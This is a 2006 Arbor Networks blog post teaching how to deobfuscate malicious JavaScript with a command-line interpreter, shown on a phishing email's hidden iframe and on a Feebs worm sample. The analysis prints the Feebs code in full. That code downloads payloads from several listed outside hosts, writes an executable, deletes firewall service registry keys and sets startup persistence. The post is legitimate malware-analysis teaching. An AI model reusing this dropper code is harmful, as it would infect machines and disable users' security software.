Arbor Networks: Security to the Core

Every now and then, malicious or obfuscated JavaScript will appear on the radar, and this is how I’ve developed ways to determine what’s going on. The goals of malicious JavaScript are obvious: exploit a web browser vulnerability. The goals of obfuscated JavaScript are a bit more complicated: get the JavaScript past the filters to direct someone to a malicious page. Not really complicated, but they are hoping to get past the proxies and sensors in place.

Here’s a sample that came in a malicious e-mail. It did not exploit anything, but it would take a user to another page where malicious HTML was waiting:

(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;
0usvtu5gsff/xt0@je>joefy31(?=0jgsbnf?#*>>

Did you get that? Did you see what is going to happen? You can load it in your browser and dump the DOM, but if you want to watch more directly, you can use a command line JavaScript toolkit to execute the code. I use the NJS toolset, which gives me a command line compiler, error checking, the whole gamut. So, now I dump my JavaScript under study into a file (”mal.js”) and then use the JavaScript interpreter (”js”) to execute it:

$ js mal.js VM: warning: using undefined global `document' js:
evaluation of file `mal.js' failed: StringStream:1: illegal object for call_method

Oops! That doesn’t work! Note that it is trying to write to an object “document.” If you know JavaScript, then you know that this is the current document in the web browser window. Since no such object exists on the command line, we have to make one. So, we will prepend our suspicious input file with the following code:

function MyDoc() {
function write(text) {
print(text);
}
}
document=new MyDoc();

This creates a document object and gives it a write() method, just like we are looking for in a normal web browser. When we run it, we can see our output (note that I’ve obfuscated the tags to prevent your browser from interpreting it):

$ js mal.js
[iframe style='display:none' width=1 height=1 xsrc='http://trust4free.ws/?id=index20'][/iframe]

Success! We have studied some basic obfuscated JavaScript. There is a dozen or so different variants of this per month; it seems to be someone’s favorite trick right now. Nothing special about it, some basic obfuscation, and now you can make sense of it.

We can even do this for a Feebs variant that is nothing more than obfuscated JavaScript. If you look at the source of a Feebs sample, it doesn’t make sense. So, let the trickery begin: prepend the document object creation and then execute it (tags obfuscated again, this is live malware):

$ js Extended Html File.hta.js
Connecting to   HotMail.com secure mail server…[script language =
JavaScript] function u() {document.write(’Unable To Connect to Server.
Please check your  Internet connection and try again. [script
language=JavaScript]cj=unescape(”%5C”);dr=”c:”+cj+”Recycled”+cj;
g=dr+”userin it.exe”;try{y=new
ActiveXObject(”Scripting.FileSystemObject”); z=new
ActiveXObject(”WScript.Shell”);nx=1;if(y.FileExists(g)){ex=y.GetFile(g);
if(e x.size]20000)nx=0;}function fl(){return
false}document.oncontextmenu=fl;
y.CreateFolder(dr);}catch(t1){};[/script] [s cript language=”vbs”]If
nx Thennset
IE=CreateObject(”InternetExplorer.Application”)nIE.Visible=0nSub
SpnWhile IE.Busy=truenWendnEnd Subnur=
Array(”poljop.freecoolsite.com/test.txt”,”hoop.kazan.bz/god.txt”,”
fr33.by.ru/ol.txt”,”nolko.t35.com/god.c”,”jmo31.by.ru/big.txt”,”psyt.woz.
bz/test.txt”,”duuw.nm.ru/ol.txt”)nFor un=0 To 6nIE.Navigate(ur(un))
nSpni=IE.Document.body.innerTextnIf Len(i)]50000 ThennExit FornEnd
Ifni=”"nNextnSub bsnc=Len(i)nIf(c)Then
nf=”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv
wxyz0123456789+/”n For e=1 To c Step 4np=3nr=0nFor h=0 To
3nj=Mid(i,e+h,1)nIf j=”=”  Thennp=p-1nk=0nElseIf j=”?” ThennSet
b=y.CreateTextFile(g,True)n b.Write snb.ClosenExit
SubnElsenk=InStr(1,f,j,vbBinaryCompare)-1nEnd
Ifnr=64*r+knNextnr=Hex(r)nr=String(6-Len(r),”0″)&rn
t=Chr(CByte(”&H”&Mid (r,1,2)))+Chr(CByte(”&H”&Mid(r,3,2)))+Chr(
CByte(”&H”&Mid(r,5,2)))ns=s&Left( t,p)nNextnEnd IfnEnd SubnEnd
Ifnbsnz.RegWrite “HKCUSoftwareMicrosoftInternet
Explorermal”,”NAME@DOMAIN.COM”,”REG_SZ”[/script][script
language=JavaScript]function f1(){b1=0;function
f2(na){b2=0;r1=”HKLM”+cj+”SYSTEM”+cj+”CurrentControlSet”+cj+”Services”+cj;tr
y{z.RegDelete(r1+na+cj);b2=1;}catch(t1){};return(b2);}r2=”HKLM”+cj+”SOFTWARE
“+cj+”Microsoft”+cj;ke=”Active Setup”+cj+”Installed
Components”+cj+”{CD5AC91B-AE7B-E83A-0C4C-E616075972F3}”+cj+”Stubpath”;if(f2(
“pcipim”)+f2(”pcIPPsC”)+f2(”RapDrv”)+f2(”FirePM”)+f2(”KmxFile”))b1=1;try{z.R
egWrite(r2+ke,g,”REG_SZ”);z.RegRead(r2+ke);}catch(t1){try{y.CopyFile(g,z.Reg
Read(r2+”Windows”+cj+”CurrentVersion”+cj+”Explorer”+cj+”Shell
Folders”+cj+”Common
Startup”)+cj);}catch(t1){b1=0};};return(b1);}try{if(nx&&!f1())z.run(g);}catc
h(x){};[/script]’); }; setTimeout(”u()”, 0); [/script]

Now, with something like Feebs, this is a lot more complicated and you have to repeat the process, and also you have to use the VB Script interpreter on a Microsoft Windows system to finish the investigation, but you get the idea. Feebs downloads a bunch of pieces and analyzes them, installs it using VB Script, and then launches it.

And that’s a very simple way to start investigating malicious JavaScript in a safe(r) environment. You’ll find this often used by commercial HTML protection tools, sometimes cribbed by the malware community. This is used to obfuscate analysis of the HTML (i.e. some special tricks used to get layout working just right) or of the JavaScript (in the case of malware). In the latter case it’s to bypass security checks.

This entry was posted on Thursday, April 20th, 2006 at 11:46 am and is filed under Exploit Code, Forensics, Malware, Reverse Engineering. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.